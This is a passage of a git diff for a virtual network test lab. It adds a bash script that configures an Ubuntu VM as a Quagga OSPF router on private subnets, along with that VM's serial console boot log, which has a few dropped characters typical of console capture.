@@ +#!/bin/bash +# + +OLD_NAME=vague-router +HNAME=router1 + +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hostname +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts +hostname $HNAME +apt-get update +apt-get install quagga quagga-doc traceroute +cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf +cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf +chown quagga.quaggavty /etc/quagga/*.conf +chmod 640 /etc/quagga/*.conf +sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons +sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons +echo 'VTYSH_PAGER=more' >>/etc/environment +echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc +cat >> /etc/quagga/ospfd.conf << EOF +interface enp0s8 +interface enp0s9 +interface enp0s10 +interface lo +router ospf + passive-interface enp0s8 + network 192.168.1.0/24 area 0.0.0.0 + network 192.168.100.0/24 area 0.0.0.0 + network 192.168.101.0/24 area 0.0.0.0 +line vty +EOF +cat >> /etc/quagga/zebra.conf << EOF +interface enp0s8 + ip address 192.168.1.254/24 + ipv6 nd suppress-ra +interface enp0s9 + ip address 192.168.100.1/24 + ipv6 nd suppress-ra +interface enp0s10 + ip address 192.168.101.2/24 + ipv6 nd suppress-ra +interface lo +ip forwarding +line vty +EOF +/etc/init.d/quagga start + +# Disable rp_filter and enable forwarding for routers +# +echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf + +echo "net.ipv4.conf.all.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.default.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.lo.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s3.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s8.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s9.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s10.rp_filter=0" >> /etc/sysctl.conf + +sysctl -p + +exit diff --git a/virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log new file mode 100644 index 0000000..b68a835 --- /dev/null +++ b/virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log @@ -0,0 +1,666 @@ +[ 0.00000 Initializing cgroup subsys cpuset +[ 0.000000] Initializing cgroup subsys cpu +[ 0.000000] Initializing cgroup subsys cpuacct +[ 0.00000] Linux vrsion 4.4.0-190-generic (buldd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubunu 5.4.0-6ubuntu1~16.0.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) +[ 0.000000] Command line: BOOT_IMAGE=/boot/vmmlinz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] KERNEL supported cpus: +[ 0.000000] Intel GenuineIntel +[ 0.000000] AMD AuthenticAMD +[ 0.000000] Centaur CentaurHauls +[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2] 256 [ 0.000000 x86/fp: Supporting XSAVE feature 0x01: 'x87 flating point registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' +[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. +[ 0.000000] e820: BIOS-provided physical RAM map: +[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable +[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved +[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable +[ 0.000000] BIOS-e820: [mem 0x00000003fff000-0x000000003fffffff] ACPI data +[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-x00000000fec00fff] reserved +[ 0.000000] BIOS-e820: [m 0x00000000fee00000-0x00000000fee00fff] reserved +[ 0.000000] BOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved +[ 0.000000] NX (Execute Disable) protection: active +[ 0.000000] SMBIOS 2.5 present. +[ 0.000000] Hypervisor detected: KVM +[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 +[ 0.00000] MTRR: Disabled +[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. +[ 0.000000] CPU MTRRs all blank - virtualized system. +[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC +[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] +[ 0.000000] Scanning 1 areas for low memory corruption +[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] +[ 0.000000] ACPI: Early table checksum verification disabled +[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) +[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) +[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) +[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) +[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) +[ 0.000000] No NUMA configuration found +[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] +[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] +[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 +[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock +[ 0.000000] kvm-clock: using sched offset of 3577766287 cycles +[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns +[ 0.000000] Zone ranges: +[ 0.000000] DMA [mem 0x00000000001000-0x0000000000ffffff] +[ 0.000000] DMA32 [em 0x0000000001000000-0x000000003ffeffff] +[ 0.000000] Normal empty +[ 0.000000] Device empty +[ 0.000000] Movable zone start for each node +[ 000000] Early memory node ranges +[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] +[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] +[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] +[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 +[ 0.000000]OAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 +[ 0.000000] ACPI: INTSRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +[ 0.000000] ACPI: INT_SRCVR (bus 0 bus_irq 9 global_irq 9 low level) +[ 0.000000] Using ACPI (MADT) for SMP configuration information +[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs +[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] +[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] +[ 0.000000] PM: Reistered nosave memor: [mem 0x000a0000-0x000effff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] +[ 0.000000] e820: [mem 0x40000000-0xfebfffff] avilable for PCIdevices +[ 0.000000] Booting paavirtualized kernel on KVM +[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns +[ 0.000000] setup_percpu: R_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 +[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 +[ 0.000000] Built 1 zonelists in Node order, mobilty grouping on. Total pages: 257912 +[ 0.000000] Policy zone: DMA32 +[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) +[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) +[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 +[ 0.000000] Kernel/User page tables isolation: enabled +[ 0.000000] Hierarchical RCU implementation. +[ 0000000] Build-time adjustment of leaf fanout to 64. +[ 0.000000] RCU restrictig CPUs from NR_CPUS=512 to nr_cpu_ids=2. +[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 +[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 +[ 0.000000] Console: colour VGA+ 80x25 +[ 0.000000] console [tty1] enabled +[ 0.000000] console [ttyS0] enabled +[ 0.000000] tsc: Detected 2207.998 MHz processor +[ 1.584822] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) +[ 1.631327] pid_max: default: 32768 minimum: 301 +[ 1.655585] ACPI: Core revision 20150930 +[ 1.676263] ACPI: 2 ACPI AML tables successfully acquired and loaded +[ 1.753855] Security Framework initialized +[ 1.808111] Yama: becoming mindful. +[ 1.823958] AppArmor: AppArmor initialized +[ 1.830115] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) +[ 1.846517] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) +[ 1.868486] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.885296] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.892428] Initializing cgroup subsys io +[ 1.907946] Initializing cgroup subsys memory +[ 1.912181] Initializing cgroup subsys devices +[ 1.914280] Initializing cgroup subsys freezer +[ 1.917778] Initializing cgroup subsys net_cls +[ 1.920083] Initializing cgroup subsys perf_event +[ 1.922279] Initializing cgroup subsys net_prio +[ 1.924490] Initializing cgroup subsys hugetlb +[ 1.926773] Initializing cgroup subsys pids +[ 1.942378] mce: CPU supports 0 MCE banks +[ 1.944188] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 +[ 1.946430] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 +[ 1.949058] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization +[ 1.953092] Spectre V2 : Mitigation: Full generic retpoline +[ 1.955578] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch +[ 1.960200] Speculative Store Bypass: Vulnerable +[ 1.962680] SRBDS: Unknown: Dependent on hypervisor status +[ 1.965251] MDS: Mitigation: Clear CPU buffers +[ 1.970315] Freeing SMP alternatives memory: 36K +[ 1.979201] ftrace: allocating 32339 entries in 127 pages +[ 2.088483] smpboot: APIC(0) Converting physical 0 to logical package 0 +[ 2.106057] smpboot: Max logical packages: 1 +[ 2.109399] x2apic enabled +[ 2.125488] Switched APIC routing to physical x2apic. +[ 2.141318] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 +[ 2.254831] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) +[ 2.271753] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. +[ 2.306489] KVM setup paravirtual spinlock +[ 2.330041] x86: Booting SMP configuration: +[ 2.347325] .... node #0, CPUs: #1 +[ 2.359503] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock +[ 2.404300] mce: CPU supports 0 MCE banks +[ 2.410177] x86: Booted up 1 node, 2 CPUs +[ 2.413184] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) +[ 2.418835] devtmpfs: initialized +[ 2.423918] evm: security.selinux +[ 2.427736] evm: security.SMACK64 +[ 2.440920] evm: security.SMACK64EXEC +[ 2.443187] evm: security.SMACK64TRANSMUTE +[ 2.451368] evm: security.SMACK64MMAP +[ 2.463561] evm: security.ima +[ 2.491699] evm: security.capability +[ 2.521294] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns +[ 2.549809] futex hash table entries: 512 (order: 3, 32768 bytes) +[ 2.563744] pinctrl core: initialized pinctrl subsystem +[ 2.571711] RTC time: 22:38:13, date: 01/25/21 +[ 2.580323] NET: Registered protocol family 16 +[ 2.642487] cpuidle: using governor ladder +[ 2.654477] cpuidle: using governor menu +[ 2.660730] PCCT header not found. +[ 2.661679] ACPI: bus type PCI registered +[ 2.679166] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 +[ 2.710268] PCI: Using configuration type 1 for base access +[ 2.724923] ACPI: Added _OSI(Module Device) +[ 2.734823] ACPI: Added _OSI(Processor Device) +[ 2.737903] ACPI: Added _OSI(3.0 _SCP Extensions) +[ 2.742608] ACPI: Added _OSI(Processor Aggregator Device) +[ 2.745984] ACPI: Executed 1 blocks of module-level executable AML code +[ 2.754306] ACPI: Interpreter enabled +[ 2.757992] ACPI: (supports S0 S5) +[ 2.761176] ACPI: Using IOAPIC for interrupt routing +[ 2.765378] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug +[ 2.799602] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) +[ 2.808008] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] +[ 2.814535] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] +[ 2.822878] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. +[ 2.832705] PCI host bridge to bus 0000:00 +[ 2.835924] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] +[ 2.841196] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] +[ 2.843137] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] +[ 2.844936] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] +[ 2.852070] pci_bus 0000:00: root bus resource [bus 00-ff] +[ 2.860417] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] +[ 2.867356] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] +[ 2.870972] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] +[ 2.902386] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] +[ 2.945070] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI +[ 2.948408] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB +[ 2.973696] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) +[ 2.976588] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) +[ 2.982185] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) +[ 2.987576] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) +[ 2.992953] ACPI: Enabled 2 GPEs in block 00 to 07 +[ 2.995289] vgaarb: setting as boot device: PCI:0000:00:02.0 +[ 2.998992] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none +[ 3.004146] vgaarb: loaded +[ 3.007135] vgaarb: bridge control possible 0000:00:02.0 +[ 3.011388] SCSI subsystem initialized +[ 3.018637] ACPI: bus type USB registered +[ 3.021818] usbcore: registered new interface driver usbfs +[ 3.025422] usbcore: registered new interface driver hub +[ 3.029793] usbcore: registered new device driver usb +[ 3.039308] PCI: Using ACPI for IRQ routing +[ 3.040724] NetLabel: Initializing +[ 3.041664] NetLabel: domain hash size = 128 +[ 3.042697] NetLabel: protocols = UNLABELED CIPSOv4 +[ 3.047577] NetLabel: unlabeled traffic allowed by default +[ 3.049513] amd_nb: Cannot enumerate AMD northbridges +[ 3.082536] clocksource: Switched to clocksource kvm-clock +[ 3.103717] AppArmor: AppArmor Filesystem Enabled +[ 3.104917] pnp: PnP ACPI init +[ 3.106440] pnp: PnP ACPI: found 3 devices + +[ 3.173033] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns +[ 3.175543] NET: Registered protocol family 2 +[ 3.180971] TCP established hash table entries: 8192 (order: 4, 65536 bytes) +[ 3.190229] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) +[ 3.196749] TCP: Hash tables configured (established 8192 bind 8192) +[ 3.200555] UDP hash table entries: 512 (order: 2, 16384 bytes) +[ 3.204791] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) +[ 3.210203] NET: Registered protocol family 1 +[ 3.211324] pci 0000:00:00.0: Limiting direct PCI/PCI transfers +[ 3.212750] pci 0000:00:01.0: Activating ISA DMA hang workarounds +[ 3.218025] Unpacking initramfs... +[ 3.720923] Freeing initrd memory: 14880K +[ 3.722708] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns +[ 3.728510] platform rtc_cmos: registered platform RTC device (no PNP device found) +[ 3.732202] Scanning for low memory corruption every 60 seconds +[ 3.746818] audit: initializing netlink subsys (disabled) +[ 3.749003] audit: type=2000 audit(1611614297.048:1): initialized +[ 3.751938] Initialise system trusted keyring +[ 3.754336] HugeTLB registered 2 MB page size, pre-allocated 0 pages +[ 3.758943] zbud: loaded +[ 3.760892] VFS: Disk quotas dquot_6.6.0 +[ 3.763098] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) +[ 3.766533] squashfs: version 4.0 (2009/01/31) Phillip Lougher +[ 3.769469] fuse init (API version 7.23) +[ 3.771387] Key type big_key registered +[ 3.773320] Allocating IMA MOK and blacklist keyrings. +[ 3.802211] Key type asymmetric registered +[ 3.803966] Asymmetric key parser 'x509' registered +[ 3.805980] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) +[ 3.809309] io scheduler noop registered +[ 3.811018] io scheduler deadline registered (default) +[ 3.813210] io scheduler cfq registered +[ 3.815041] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 +[ 3.817546] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 +[ 3.820411] ACPI: AC Adapter [AC] (on-line) +[ 3.822362] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 +[ 3.825505] ACPI: Power Button [PWRF] +[ 3.827196] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 +[ 3.830473] ACPI: Sleep Button [SLPF] +[ 3.837924] ACPI: Battery Slot [BAT0] (battery present) +[ 3.839991] GHES: HEST is not enabled! +[ 3.841729] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled +[ 3.877948] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A +[ 3.886569] Linux agpgart interface v0.103 +[ 3.895752] loop: module loaded +[ 3.897981] scsi host0: ata_piix +[ 3.900123] scsi host1: ata_piix +[ 3.905270] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 +[ 3.913286] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 +[ 3.920230] libphy: Fixed MDIO Bus: probed +[ 3.922781] tun: Universal TUN/TAP device driver, 1.6 +[ 3.924879] tun: (C) 1999-2004 Max Krasnyansky +[ 3.927112] PPP generic driver version 2.4.2 +[ 3.929588] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver +[ 3.935229] ehci-pci: EHCI PCI platform driver +[ 3.938561] ehci-platform: EHCI generic platform driver +[ 3.941645] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver +[ 3.946434] ohci-pci: OHCI PCI platform driver +[ 3.949379] ohci-platform: OHCI generic platform driver +[ 3.956472] uhci_hcd: USB Universal Host Controller Interface driver +[ 3.959140] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 +[ 3.967060] serio: i8042 KBD port at 0x60,0x64 irq 1 +[ 3.975868] serio: i8042 AUX port at 0x60,0x64 irq 12 +[ 3.984044] mousedev: PS/2 mouse device common for all mice +[ 3.990653] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 +[ 3.996769] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 +[ 3.996830] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram +[ 3.996837] i2c /dev entries driver +[ 3.996895] device-mapper: uevent: version 1.0.3 +[ 3.996951] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com +[ 3.996967] ledtrig-cpu: registered to indicate activity on CPUs +[ 3.997258] NET: Registered protocol family 10 +[ 3.997442] NET: Registered protocol family 17 +[ 3.997455] Key type dns_resolver registered +[ 3.997689] registered taskstats version 1 +[ 3.997706] Loading compiled-in X.509 certificates +[ 3.998388] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' +[ 3.998403] zswap: loaded using pool lzo/zbud +[ 4.002781] Key type trusted registered +[ 4.005743] Key type encrypted registered +[ 4.005750] AppArmor: AppArmor sha1 policy hashing enabled +[ 4.005752] ima: No TPM chip found, activating TPM-bypass! +[ 4.005761] ima: Allocated hash algorithm: sha1 +[ 4.005773] evm: HMAC attrs: 0x1 +[ 4.006145] Magic number: 5:763:654 +[ 4.008225] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:14 UTC (1611614294) +[ 4.008310] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found +[ 4.008311] EDD information not available. +[ 4.117278] Freeing unused kernel memory: 1492K +[ 4.132547] Write protecting the kernel read-only data: 14336k +[ 4.144508] Freeing unused kernel memory: 1592K +[ 4.147955] Freeing unused kernel memory: 56K +Loading, please wait... +starting version 229 +[ 4.192923] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.193424] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.193508] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.193530] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.193553] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.232994] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.260680] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.269690] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.269753] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.269919] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.449033] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI +[ 4.450585] e1000: Copyright (c) 1999-2006 Intel Corporation. +[ 4.455982] Fusion MPT base driver 3.04.20 +[ 4.467534] Copyright (c) 1999-2008 LSI Corporation +[ 4.506360] Fusion MPT SPI Host driver 3.04.20 +[ 4.612452] AVX2 version of gcm_enc/dec engaged. +[ 4.617266] AES CTR mode by8 optimization enabled +[ 4.695399] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 +[ 5.142304] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff +[ 5.177787] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection +[ 5.268666] mptbase: ioc0: Initiating bringup +[ 5.339349] ioc0: LSI53C1030 A0: Capabilities={Initiator} +[ 5.522282] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 +[ 5.641602] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 5.643392] scsi target2:0:0: Beginning Domain Validation +[ 5.645891] scsi target2:0:0: Domain Validation skipping write tests +[ 5.649957] scsi target2:0:0: Ending Domain Validation +[ 5.653068] scsi target2:0:0: asynchronous +[ 5.656817] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 5.659560] scsi target2:0:1: Beginning Domain Validation +[ 5.676217] scsi target2:0:1: Domain Validation skipping write tests +[ 5.688063] scsi target2:0:1: Ending Domain Validation +[ 5.698092] scsi target2:0:1: asynchronous +[ 5.762012] sd 2:0:0:0: Attached scsi generic sg0 type 0 +[ 5.776120] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) +[ 5.787037] sd 2:0:1:0: Attached scsi generic sg1 type 0 +[ 5.821949] sd 2:0:0:0: [sda] Write Protect is off +[ 5.834208] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) +[ 5.849173] sd 2:0:0:0: [sda] Incomplete mode parameter data +[ 5.869988] sd 2:0:0:0: [sda] Assuming drive cache: write through +[ 5.872020] sd 2:0:1:0: [sdb] Write Protect is off +[ 5.880224] sd 2:0:1:0: [sdb] Incomplete mode parameter data +[ 5.897844] sd 2:0:1:0: [sdb] Assuming drive cache: write through +[ 5.917396] sda: sda1 +[ 5.929228] sd 2:0:0:0: [sda] Attached SCSI disk +[ 5.957652] sd 2:0:1:0: [sdb] Attached SCSI disk +[ 6.448451] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:4e:d5:19 +[ 6.459835] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection +[ 7.163610] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:25:02:6b +[ 7.171557] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection +[ 7.706828] e1000 0000:00:0a.0 eth3: (PCI:33MHz:32-bit) 08:00:27:80:81:f6 +[ 7.709705] e1000 0000:00:0a.0 eth3: Intel(R) PRO/1000 Network Connection +[ 7.719303] e1000 0000:00:08.0 enp0s8: renamed from eth1 +[ 7.736823] e1000 0000:00:09.0 enp0s9: renamed from eth2 +[ 7.764808] e1000 0000:00:0a.0 enp0s10: renamed from eth3 +[ 7.804805] e1000 0000:00:03.0 enp0s3: renamed from eth0 +Begin: Loading essential drivers ... [ 9.168889] md: linear personality registered for level -1 +[ 9.173824] md: multipath personality registered for level -4 +[ 9.192823] md: raid0 personality registered for level 0 +[ 9.214455] md: raid1 personality registered for level 1 +[ 9.293233] raid6: sse2x1 gen() 10708 MB/s +[ 9.362777] raid6: sse2x1 xor() 5662 MB/s +[ 9.512586] raid6: sse2x2 gen() 8328 MB/s +[ 9.588585] raid6: sse2x2 xor() 5519 MB/s +[ 9.656900] raid6: sse2x4 gen() 8367 MB/s +[ 9.725014] raid6: sse2x4 xor() 5385 MB/s +[ 9.793901] raid6: avx2x1 gen() 8550 MB/s +[ 9.863534] raid6: avx2x2 gen() 5033 MB/s +[ 9.936521] raid6: avx2x4 gen() 6470 MB/s +[ 9.938378] raid6: using algorithm sse2x1 gen() 10708 MB/s +[ 9.940358] raid6: .... xor() 5662 MB/s, rmw enabled +[ 9.942239] raid6: using avx2x2 recovery algorithm +[ 9.945112] xor: automatically using best checksumming function: +[ 9.985261] avx : 18756.000 MB/sec +[ 9.988280] async_tx: api initialized (async) +[ 10.066783] md: raid6 personality registered for level 6 +[ 10.069978] md: raid5 personality registered for level 5 +[ 10.072320] md: raid4 personality registered for level 4 +[ 10.105740] md: raid10 personality registered for level 10 +done. +Begin: Running /scripts/init-premount ... done. +Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. +Begin: Running /scripts/local-premount ... [ 10.152193] Btrfs loaded +Scanning for Btrfs filesystems +done. +Warning: fsck not present, so skipping root file system +[ 10.243624] EXT4-fs (sda1): INFO: recovery required on readonly filesystem +[ 10.250520] EXT4-fs (sda1): write access will be enabled during recovery +[ 10.351171] EXT4-fs (sda1): orphan cleanup on readonly fs +[ 10.358590] EXT4-fs (sda1): 1 orphan inode deleted +[ 10.727057] EXT4-fs (sda1): recovery complete +[ 10.733945] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) +done. +Begin: Running /scripts/local-bottom ... done. +Begin: Running /scripts/init-bottom ... done. +[ 10.944376] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) +[ 10.982777] systemd[1]: Detected virtualization oracle. +[ 10.995335] systemd[1]: Detected architecture x86-64. + +Welcome to Ubuntu 16.04.7 LTS! + +[ 11.033545] systemd[1]: Set hostname to . +[ 11.213000] random: nonblocking pool is initialized +[ 11.309342] systemd[1]: Listening on udev Control Socket. +[ OK ] Listening on udev Control Socket. +[ 11.322110] systemd[1]: Started Forward Password Requests to Wall Directory Watch. +[ OK ] Started Forward Password Requests to Wall Directory Watch. +[ 11.339172] systemd[1]: Reached target Swap. +[ OK ] Reached target Swap. +[ 11.343197] systemd[1]: Created slice System Slice. +[ OK ] Created slice System Slice. +[ 11.347346] systemd[1]: Created slice system-serial\x2dgetty.slice. 